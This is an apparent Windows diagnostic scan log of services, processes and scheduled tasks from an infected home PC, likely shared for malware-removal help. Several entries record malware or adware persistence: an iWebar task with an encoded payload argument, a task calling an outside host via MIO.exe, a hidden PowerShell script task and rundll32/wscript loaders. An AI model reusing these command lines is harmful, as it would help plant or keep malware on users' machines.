O23 - Service: NVIDIA GeForce Experience Service (GfExperienceService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Hi-Rez Studios Authenticate and Update Service (HiPatchService) - Hi-Rez Studios - D:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
O23 - Service: Heroes & Generals Steam Service (HnGSteamService) - Reto-Moto ApS - D:\Steam\steamapps\common\Heroes & Generals\hngservice.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: ExplorerService (iedvutils) - Unknown owner - C:\Program Files (x86)\Explorer\iedvutils.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\Windows\system32\igfxCUIService.exe (file missing)
O23 - Service: Service Installer TrueKey (InstallerService) - Unknown owner - C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
O23 - Service: iThemes5 - Unknown owner - rundll32.exe (file missing)
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Nexon Game Security Service (NGS) - NEXON Korea Corporation - C:\Windows\NGService.exe
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\Windows\system32\GameMon.des.exe (file missing)
O23 - Service: NVIDIA Network Service (NvNetworkService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
O23 - Service: NVIDIA Streamer Service (NvStreamSvc) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Service Mgr DragonBranch - Unknown owner - C:\ProgramData\b56dff5a-df23-4e43-acde-a4f08b8dcffb\plugincontainer.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: SInstalátor (ssinstall) - PS Media s.r.o. - C:\Windows\SysWOW64\ssins.exe
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: Intel Security True Key (TrueKey) - McAfee, Inc. - C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe
O23 - Service: Intel Security True Key Scheduler (TrueKeyScheduler) - McAfee, Inc. - C:\Program Files\TrueKey\McTkSchedulerService.exe
O23 - Service: Intel Security True Key Helper Service (TrueKeyServiceHelper) - McAfee, Inc. - C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 15714 bytes

====== Enumerating Processes ======

C:\Windows\system32\wininit.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\igfxCUIService.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
C:\Windows\System32\svchost.exe -k utcsvc
C:\Windows\SysWOW64\svchost.exe -k GubedZLGroupEx
"D:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe"
"C:\Program Files\Intel\iCLS Client\HeciServer.exe"
C:\Windows\SysWOW64\PnkBstrA.exe
C:\Windows\SysWOW64\ssins.exe
"C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe"
"C:\Program Files\TrueKey\McTkSchedulerService.exe"
"C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe"
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\taskeng.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
"C:\Program Files (x86)\iWebar\ebfb2b44-02ff-4b76-97d9-ff80b8ea24e0-1-6.exe" /rawdata=d6RPQwFUzmEwL/EGLBF/0nLlQsb623UqJmcONQA6+iU9wioRkqB0B/5vMuTL6KgJ6udbyL0n90NdMallzewj78/2Y4kv6Q07pU7pQEI1MDz9yY247eUIHnzy6/vyYPTargtcc8pRChlCurzahovHK6Yt9nGInQ/WSinegW4JojUA/PHFzef3rMLtuX2mNHh4CPJ4N3nvXVyRJJO7Y+8hzADPI1J1cj+X5uiqagW3msV+Jb4tm0Hn+TbCmgv6AHJTZD/KW0d9zZjd9uvnjhusHg5WN0HJhQsJ0XmiC7Vp4hk9kIZ/Vj9M9ikbmRSO7w3AS28aSQzkVt07LdCw65GoPArLnEgUV6g/VS8trSxIppFxtkBLSPtiZoFBdW7Zf13qe/B9Zo+15HqVxz/9zmwohwDXAzCw7Hmp1HlAyqcnJSjG8vJoAT7CpslBU+gznZKPKEd3payJBewD9iEWnK2O4EZODejBrjDFQUe6HHrU37eLrQeyGtXsxRPFPJSzgvDrwYW3mykc/CSelIB7Mv87v2Bm5uZxd8Bn7CCWNJTwfImd+z/oxd1dFwqn1nbbi3THDCG+s8H661z8JQlTP5uyJdCvgNIhFDDKDA2tX93gkEnULimtF9Iux7tZi1lhmk+saQiVZFot82mFCNp+1RDpMU8OAZqXNAFt4dNRwOyGX/CJ7d/DOcxQdnwS6pNQ4hrmTVOtJf4cOUsuAHVXXTWSQ3g1K7ZKoNJAo1jFOjITdwwtMObGT77mI6h9EkgfBsAtGYEKTowf/tVcpfp5Cq/7rPJbjLUo7dg3bgbuT0pE6jiW/FBcvUuhOQAVIeruDADH9l5t9oPQBMD0TNIbVKgOlIU+4c6ygrl6pNcY/PE78BRRXes/PhkaepgZw/p4dzajO8P2rBbk7lToFaH4ts9qtjgcuHOpQMsabfV66yuRsPZs1XaKkq1BN+t6zxkDNfqQIlZFai0ZX9jCoQhifYgQNYa89FLRHMF5ZK+d27MF63cIcFfFJAuo3GGum0nPN1d1XYLoaaXVJLUSJkFdXY6Ln6qUzTKhv0raUI8xMZS00ZTkMa6lMvyPCl5d6CvjcddjG9H3OyNJ3rJlgUEO5LoQQPw4bkGpcMLuWlsAYhMXSDd5tuMISTBm5KN+MazasE2JQhHD6DQnU6VOpbD+lFLl2opx1R88QovmeKoVuMzi0hAYKCDOpu/J//uVAxbC5B8kJ89OyynmOqUuJVfFgfBQUA4o2ywtf6QsyJlz6TdQyDyC4WqbkVXV5ap9jtPU74kWr/Ke51gXmDLDOO/J85nPbl1Z0H2MRU1UwFUHRN9X9eZZ/nIL2cnxgW8Ah6dOvTk1OM7SUbeoEZrx3uA4hOl8lpGVtLSnIEpCj3+RHfSvMu2ySbHYAxpKeoFY174TryVSzmWP+M/qo861Y/5Pa91T4uVINUpnUZdQVdfbMs4q8vzMDpLlOgOod6Q7vTczJgCnXffuAOSvh2EO9wKSDajWeaOBkGoD65vp6b6iSg4gwisQcHFc837rfbyZb0mB/7Fy
C:\Windows\system32\SearchIndexer.exe /Embedding
"C:\Program Files (x86)\amuleC\ed2k.exe" -downloadwhenidle
"C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe"
"C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe"
"C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe"
"C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe"
"C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe"
"C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe"
"C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe"
"C:\Windows\system32\nvvsvc.exe"
C:\Windows\system32\taskhost.exe
C:\Windows\System32\WinLogon.exe -SpecialSession
C:\Windows\System32\dwm.exe
"C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe"
C:\Windows\system32\nvvsvc.exe -session
C:\Windows\system32\taskhostex.exe
C:\PROGRA~1\TrueKey\MCAFEE~2.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\igfxEM.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
"C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
C:\Program Files\Classic Shell\ClassicStartMenu.exe
"C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe" 5dc11277-ac0d-491e-91d7-617503a0a49c
"C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe" serviceapp
\??\C:\Windows\system32\conhost.exe 0x4
\??\C:\Windows\system32\conhost.exe 0x4
"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Users\GIGABYTE\AppData\Roaming\Seznam.cz\bin\szndesktop.exe
"C:\Users\GIGABYTE\AppData\Roaming\uTorrent\utorrent.exe"
"C:\Users\GIGABYTE\AppData\Roaming\Seznam.cz\bin\listicka-x64.exe"
\??\C:\Windows\system32\conhost.exe 0x4
"C:\Users\GIGABYTE\AppData\Local\MyComGames\MyComGames.exe" -autostart
"C:\Users\GIGABYTE\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe"
"C:\Users\GIGABYTE\AppData\Local\background_fault\aswRD.exe" "C:\Users\GIGABYTE\AppData\Local\background_fault\bf.dll",background_fault_collector
C:\Windows\SysWOW64\ctfmon.exe
"C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
"C:\ProgramData\MEGAsync\MEGAsync.exe"
C:\Program Files\CCleaner\CCleaner64.exe
"C:\Program Files (x86)\Firefox\Firefox.exe" "http://www.initialpage123.com/?z=baeca7 ... 11&type=hp"
C:\Windows\system32\wbem\wmiprvse.exe
"C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe"
C:\Windows\system32\taskeng.exe
"D:\RSITx64.exe"
C:\Windows\system32\wbem\wmiprvse.exe

====== Scheduled tasks folder ======

C:\Windows\tasks\ebfb2b44-02ff-4b76-97d9-ff80b8ea24e0-1-6.job - C:\Program Files (x86)\iWebar\ebfb2b44-02ff-4b76-97d9-ff80b8ea24e0-1-6.exe /rawdata=d6RPQwFUzmEwL/EGLBF/0nLlQsb623UqJmcONQA6+iU9wioRkqB0B/5vMuTL6KgJ6udbyL0n90NdMallzewj78/2Y4kv6Q07pU7pQEI1MDz9yY247eUIHnzy6/vyYPTargtcc8pRChlCurzahovHK6Yt9nGInQ/WSinegW4JojUA/PHFzef3rMLtuX2mNHh4CPJ4N3nvXVyRJJO7Y+8hzADPI1J1cj+X5uiqagW3msV+Jb4tm0Hn+TbCmgv6AHJTZD/KW0d9zZjd9uvnjhusHg5WN0HJhQsJ0XmiC7Vp4hk9kIZ/Vj9M9ikbmRSO7w3AS28aSQzkVt07LdCw65GoPArLnEgUV6g/VS8trSxIppFxtkBLSPtiZoFBdW7Zf13qe/B9Zo+15HqVxz/9zmwohwDXAzCw7Hmp1HlAyqcnJSjG8vJoAT7CpslBU+gznZKPKEd3payJBewD9iEWnK2O4EZODejBrjDFQUe6HHrU37eLrQeyGtXsxRPFPJSzgvDrwYW3mykc/CSelIB7Mv87v2Bm5uZxd8Bn7CCWNJTwfImd+z/oxd1dFwqn1nbbi3THDCG+s8H661z8JQlTP5uyJdCvgNIhFDDKDA2tX93gkEnULimtF9Iux7tZi1lhmk+saQiVZFot82mFCNp+1RDpMU8OAZqXNAFt4dNRwOyGX/CJ7d/DOcxQdnwS6pNQ4hrmTVOtJf4cOUsuAHVXXTWSQ3g1K7ZKoNJAo1jFOjITdwwtMObGT77mI6h9EkgfBsAtGYEKTowf/tVcpfp5Cq/7rPJbjLUo7dg3bgbuT0pE6jiW/FBcvUuhOQAVIeruDADH9l5t9oPQBMD0TNIbVKgOlIU+4c6ygrl6pNcY/PE78BRRXes/PhkaepgZw/p4dzajO8P2rBbk7lToFaH4ts9qtjgcuHOpQMsabfV66yuRsPZs1XaKkq1BN+t6zxkDNfqQIlZFai0ZX9jCoQhifYgQNYa89FLRHMF5ZK+d27MF63cIcFfFJAuo3GGum0nPN1d1XYLoaaXVJLUSJkFdXY6Ln6qUzTKhv0raUI8xMZS00ZTkMa6lMvyPCl5d6CvjcddjG9H3OyNJ3rJlgUEO5LoQQPw4bkGpcMLuWlsAYhMXSDd5tuMISTBm5KN+MazasE2JQhHD6DQnU6VOpbD+lFLl2opx1R88QovmeKoVuMzi0hAYKCDOpu/J//uVAxbC5B8kJ89OyynmOqUuJVfFgfBQUA4o2ywtf6QsyJlz6TdQyDyC4WqbkVXV5ap9jtPU74kWr/Ke51gXmDLDOO/J85nPbl1Z0H2MRU1UwFUHRN9X9eZZ/nIL2cnxgW8Ah6dOvTk1OM7SUbeoEZrx3uA4hOl8lpGVtLSnIEpCj3+RHfSvMu2ySbHYAxpKeoFY174TryVSzmWP+M/qo861Y/5Pa91T4uVINUpnUZdQVdfbMs4q8vzMDpLlOgOod6Q7vTczJgCnXffuAOSvh2EO9wKSDajWeaOBkGoD65vp6b6iSg4gwisQcHFc837rfbyZb0mB/7Fy
C:\Windows\tasks\globalUpdateUpdateTaskMachineCore.job - C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe /c
C:\Windows\tasks\globalUpdateUpdateTaskMachineUA.job - C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe /ua /installsource scheduler
C:\Windows\tasks\Norton Product InstallerIdle.job - C:\Users\GIGABYTE\AppData\Local\Temp\in7D9B7D88\755C4571_stp\SymInstallStub.exe /partnerid=afterdld /productlist=nss /staging=false /affid=afterdld13_16_50 /delay=0 /launchedby=4
C:\Windows\tasks\PC SpeedUp Service Deactivator.job - C:\Program Files (x86)\Zrychleni Pocitace\PCSUSD.exe /dev0 /idle
C:\Windows\system32\tasks\Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Windows\system32\tasks\Adobe Flash Player Updater - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
C:\Windows\system32\tasks\Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
C:\Windows\system32\tasks\BikaQ_FetchAndUpgrade_CanBeDel - "C:\Program Files (x86)\BikaQRss\BikaQ.exe" -fetch_and_upgrade
C:\Windows\system32\tasks\Browser Updater Task(Core) - ""C:\Program Files (x86)\TXQQBrowser\Update\9440BC9AED3B093EA7C0B3D6F6130C64\Update\BrowserUpdate.exe"" 87B20C06-6890-4CFE-B40F-004064F87F12
C:\Windows\system32\tasks\Call Extension2 - C:\Windows\system32\rundll32.exe "C:\Users\GIGABYTE\AppData\Local\Call Extension\{4279A651-8DC9-F6CE-5A77-DDF7F82EE9BF}\lhn.dll",#1
C:\Windows\system32\tasks\CCleanerSkipUAC - "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
C:\Windows\system32\tasks\ebfb2b44-02ff-4b76-97d9-ff80b8ea24e0-1-6 - C:\Program Files (x86)\iWebar\ebfb2b44-02ff-4b76-97d9-ff80b8ea24e0-1-6.exe /rawdata=d6RPQwFUzmEwL/EGLBF/0nLlQsb623UqJmcONQA6+iU9wioRkqB0B/5vMuTL6KgJ6udbyL0n90NdMallzewj78/2Y4kv6Q07pU7pQEI1MDz9yY247eUIHnzy6/vyYPTargtcc8pRChlCurzahovHK6Yt9nGInQ/WSinegW4JojUA/PHFzef3rMLtuX2mNHh4CPJ4N3nvXVyRJJO7Y+8hzADPI1J1cj+X5uiqagW3msV+Jb4tm0Hn+TbCmgv6AHJTZD/KW0d9zZjd9uvnjhusHg5WN0HJhQsJ0XmiC7Vp4hk9kIZ/Vj9M9ikbmRSO7w3AS28aSQzkVt07LdCw65GoPArLnEgUV6g/VS8trSxIppFxtkBLSPtiZoFBdW7Zf13qe/B9Zo+15HqVxz/9zmwohwDXAzCw7Hmp1HlAyqcnJSjG8vJoAT7CpslBU+gznZKPKEd3payJBewD9iEWnK2O4EZODejBrjDFQUe6HHrU37eLrQeyGtXsxRPFPJSzgvDrwYW3mykc/CSelIB7Mv87v2Bm5uZxd8Bn7CCWNJTwfImd+z/oxd1dFwqn1nbbi3THDCG+s8H661z8JQlTP5uyJdCvgNIhFDDKDA2tX93gkEnULimtF9Iux7tZi1lhmk+saQiVZFot82mFCNp+1RDpMU8OAZqXNAFt4dNRwOyGX/CJ7d/DOcxQdnwS6pNQ4hrmTVOtJf4cOUsuAHVXXTWSQ3g1K7ZKoNJAo1jFOjITdwwtMObGT77mI6h9EkgfBsAtGYEKTowf/tVcpfp5Cq/7rPJbjLUo7dg3bgbuT0pE6jiW/FBcvUuhOQAVIeruDADH9l5t9oPQBMD0TNIbVKgOlIU+4c6ygrl6pNcY/PE78BRRXes/PhkaepgZw/p4dzajO8P2rBbk7lToFaH4ts9qtjgcuHOpQMsabfV66yuRsPZs1XaKkq1BN+t6zxkDNfqQIlZFai0ZX9jCoQhifYgQNYa89FLRHMF5ZK+d27MF63cIcFfFJAuo3GGum0nPN1d1XYLoaaXVJLUSJkFdXY6Ln6qUzTKhv0raUI8xMZS00ZTkMa6lMvyPCl5d6CvjcddjG9H3OyNJ3rJlgUEO5LoQQPw4bkGpcMLuWlsAYhMXSDd5tuMISTBm5KN+MazasE2JQhHD6DQnU6VOpbD+lFLl2opx1R88QovmeKoVuMzi0hAYKCDOpu/J//uVAxbC5B8kJ89OyynmOqUuJVfFgfBQUA4o2ywtf6QsyJlz6TdQyDyC4WqbkVXV5ap9jtPU74kWr/Ke51gXmDLDOO/J85nPbl1Z0H2MRU1UwFUHRN9X9eZZ/nIL2cnxgW8Ah6dOvTk1OM7SUbeoEZrx3uA4hOl8lpGVtLSnIEpCj3+RHfSvMu2ySbHYAxpKeoFY174TryVSzmWP+M/qo861Y/5Pa91T4uVINUpnUZdQVdfbMs4q8vzMDpLlOgOod6Q7vTczJgCnXffuAOSvh2EO9wKSDajWeaOBkGoD65vp6b6iSg4gwisQcHFc837rfbyZb0mB/7Fy
C:\Windows\system32\tasks\Gerfety Renew - "C:\Program Files (x86)\Vilerle\yaupdcache.exe" fe8c6bc5-33dc-4d98-99de-9e77c1325968
C:\Windows\system32\tasks\globalUpdateUpdateTaskMachineCore - C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe /c
C:\Windows\system32\tasks\globalUpdateUpdateTaskMachineUA - C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe /ua /installsource scheduler
C:\Windows\system32\tasks\GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
C:\Windows\system32\tasks\GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
C:\Windows\system32\tasks\McAfee Remediation (Prepare) - C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe /prepare
C:\Windows\system32\tasks\Milimili - "C:\Program Files (x86)\MIO\MIO.exe" -bindurl http://api.suibianmaimaicom.com/wdcxwd1 ... 1alz11.dat cmd=
C:\Windows\system32\tasks\Norton Product InstallerIdle - C:\Users\GIGABYTE\AppData\Local\Temp\in7D9B7D88\755C4571_stp\SymInstallStub.exe /partnerid=afterdld /productlist=nss /staging=false /affid=afterdld13_16_50 /delay=0 /launchedby=4
C:\Windows\system32\tasks\PC SpeedUp Service Deactivator - C:\Program Files (x86)\Zrychleni Pocitace\PCSUSD.exe /dev0 /idle
C:\Windows\system32\tasks\SafeZone scheduled Autoupdate 1463582842 - C:\Program Files\AVAST Software\SZBrowser\launcher.exe --scheduledautoupdate $(Arg0)
C:\Windows\system32\tasks\SPBIW_UpdateTask_Time_333739393237373439322d3437415a556c2a3223346c41 - wscript.exe //B "C:\ProgramData\ShopperPro\spbihe.js" spbiu.exe /invoke /f:check_services /l:0
C:\Windows\system32\tasks\User_Feed_Synchronization-{F1250C42-B89E-418B-A0A6-7E09B3179EA7} - C:\Windows\system32\msfeedssync.exe sync
C:\Windows\system32\tasks\Windows-PG - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1
C:\Windows\system32\tasks\{112D8A05-294A-4138-AC46-2D52F609D824} - C:\Windows\system32\pcalua.exe -a I:\DirectX9\dxsetup.exe -d I:\DirectX9
C:\Windows\system32\tasks\{24CB3825-D075-4929-A896-630919D28FE6} - C:\Windows\system32\pcalua.exe -a D:\DTLiteInstaller(2).exe -d D:\
C:\Windows\system32\tasks\{4837670A-E08E-4B9B-A394-95C9B5F5AAEC} - C:\Windows\system32\pcalua.exe -a "D:\Users\GIGABYTE\Downloads\7_Days_to_Die_Alpha_15_Free [1].exe" -d D:\Users\GIGABYTE\Downloads
C:\Windows\system32\tasks\{4BEA9266-640A-40A7-9B5E-69488F65C928} - C:\Windows\system32\pcalua.exe -a I:\Setup.exe -d I:\
C:\Windows\system32\tasks\{53FEEB06-093E-4F6F-9E49-D8C7EB9D2F34} - C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\EAInstaller\Battlefield 3\Cleanup.exe" -c uninstall_game -autologging
C:\Windows\system32\tasks\{548D33C3-3D5F-4DBA-B93C-1BE67C322792} - C:\Windows\system32\pcalua.exe -a D:\DTLiteInstaller(1).exe -d D:\
C:\Windows\system32\tasks\{7BE10FFE-5E3A-44F9-B307-D584519DE778} - C:\Windows\system32\pcalua.exe -a "D:\Games\Rayman 3\Rayman3.exe" -d "D:\Games\Rayman 3"
C:\Windows\system32\tasks\{84773145-566E-4CD9-A7E6-137B5CF003E4} - C:\Windows\system32\pcalua.exe -a D:\DTLiteInstaller.exe -d D:\
C:\Windows\system32\tasks\{876095B8-3A2B-46EC-8F61-09284E6F68B7} - C:\Windows\system32\pcalua.exe -a "D:\Prototype 2\unins000.exe"
C:\Windows\system32\tasks\{DCF38546-4FE4-4568-8621-F8A3221C5CC8} - C:\Windows\system32\pcalua.exe -a "C:\Users\GIGABYTE\AppData\Roaming\Seznam Browser\uninstall.exe"
C:\Windows\system32\tasks\{F913B398-CC2C-4409-AB38-093AE08E0596} - C:\Windows\system32\pcalua.exe -a K:\g4wl\dotnetfx3_x64.exe -d K:\g4wl
C:\Windows\system32\tasks\WPD\SqmUpload_S-1-5-21-4094854048-4285101019-4066589432-1001 - %windir%\system32\rundll32.exe portabledeviceapi.dll,#1
C:\Windows\system32\tasks\WPD\SqmUpload_S-1-5-21-4094854048-4285101019-4066589432-1002 - %windir%\system32\rundll32.exe portabledeviceapi.dll,#1
C:\Windows\system32\tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask - %systemroot%\system32\sc.exe start osppsvc
C:\Windows\system32\tasks\Microsoft\Windows\WS\License Validation - rundll32.exe WSClient.dll,WSpTLR licensing
C:\Windows\system32\tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask - rundll32.exe WSClient.dll,RefreshBannedAppsList
C:\Windows\system32\tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join - %SystemRoot%\System32\AutoWorkplace.exe join
C:\Windows\system32\tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start - C:\Windows\system32\sc.exe start wuauserv
C:\Windows\system32\tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start With Network - C:\Windows\system32\sc.exe start wuauserv
C:\Windows\system32\tasks\Microsoft\Windows\Windows Media Sharing\UpdateLibrary - "%ProgramFiles%\Windows Media Player\wmpnscfg.exe"
C:\Windows\system32\tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange - %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
C:\Windows\system32\tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting - %windir%\system32\wermgr.exe -queuereporting
C:\Windows\system32\tasks\Microsoft\Windows\UPnP\UPnPHostConfig - sc.exe config upnphost start= auto
C:\Windows\system32\tasks\Microsoft\Windows\Time Zone\SynchronizeTimeZone - %windir%\system32\tzsync.exe
C:\Windows\system32\tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime - %windir%\system32\sc.exe start w32time task_started
C:\Windows\system32\tasks\Microsoft\Windows\SystemRestore\SR - %windir%\system32\srtasks.exe ExecuteScheduledSPPCreation
C:\Windows\system32\tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask - %windir%\system32\rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
C:\Windows\system32\tasks\Microsoft\Windows\SpacePort\SpaceAgentTask - %windir%\system32\SpaceAgent.exe
C:\Windows\system32\tasks\Microsoft\Windows\Shell\FamilySafetyMonitor - %windir%\System32\wpcmon.exe
C:\Windows\system32\tasks\Microsoft\Windows\RemovalTools\MRT_HB - C:\Windows\system32\MRT.exe /EHB /Q
C:\Windows\system32\tasks\Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask - %windir%\system32\RAServer.exe /offerraupdate
C:\Windows\system32\tasks\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers - %SystemRoot%\System32\drvinst.exe 6
C:\Windows\system32\tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo - %windir%\system32\gatherNetworkInfo.vbs
C:\Windows\system32\tasks\Microsoft\Windows\MUI\LPRemove - %windir%\system32\lpremove.exe
C:\Windows\system32\tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser - %SystemRoot%\System32\MbaeParserTask.exe
C:\Windows\system32\tasks\Microsoft\Windows\Location\Notifications - %windir%\System32\LocationNotifications.exe
C:\Windows\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector - %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
